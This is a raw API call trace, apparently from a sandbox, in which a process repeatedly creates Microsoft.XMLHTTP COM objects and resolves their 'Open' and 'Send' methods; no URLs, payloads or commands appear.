	[0375.673] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0375.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0375.674] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0375.674] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0375.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0375.674] ??2@YAPEAX_K@Z () returned 0x62f310
	[0375.674] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0375.674] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0375.674] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0375.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0375.674] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0375.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.674] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0375.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.677] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0375.677] SysStringLen (param_1=0x0) returned 0x0
	[0375.677] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0375.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0375.677] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7840) returned 0x0
	[0375.677] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0375.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0375.677] ??2@YAPEAX_K@Z () returned 0x62f330
	[0375.677] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0375.677] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0375.677] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0375.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7840) returned 0x0
	[0375.678] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7840) returned 0x3
	[0375.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.678] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0375.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.678] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0375.678] SysStringLen (param_1=0x0) returned 0x0
	[0375.678] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0375.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0375.678] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0375.678] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0375.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0375.678] ??2@YAPEAX_K@Z () returned 0x62f310
	[0375.678] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0375.678] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0375.678] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0375.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0375.678] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.679] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0375.679] SysStringLen (param_1=0x0) returned 0x0
	[0375.679] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0375.679] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0375.679] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0375.679] ??2@YAPEAX_K@Z () returned 0x62f330
	[0375.679] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0375.679] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0375.679] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0375.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.680] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0375.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.680] longjmp () 
	[0375.680] longjmp () 
	[0375.680] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0375.680] SysStringLen (param_1=0x0) returned 0x0
	[0375.680] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0375.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0375.680] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7860) returned 0x0
	[0375.680] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0375.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7860, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0375.680] ??2@YAPEAX_K@Z () returned 0x62f310
	[0375.680] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0375.680] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0375.680] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0375.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7860, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7860) returned 0x0
	[0375.680] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7860) returned 0x3
	[0375.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7860, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7860, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0375.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7860, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.681] longjmp () 
	[0375.681] longjmp () 
	[0375.681] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0375.681] SysStringLen (param_1=0x0) returned 0x0
	[0375.681] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0375.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0375.681] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0375.681] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0375.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7818) returned 0x0
	[0375.681] ??2@YAPEAX_K@Z () returned 0x62f330
	[0375.681] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7818, pUnkSite=0x62f330) 
	[0375.681] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0375.681] XMLHTTPRequest:IUnknown:Release (This=0x49c7818) returned 0x0
	[0375.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0375.682] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0375.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.682] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0375.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0375.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0375.682] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0375.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0376.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
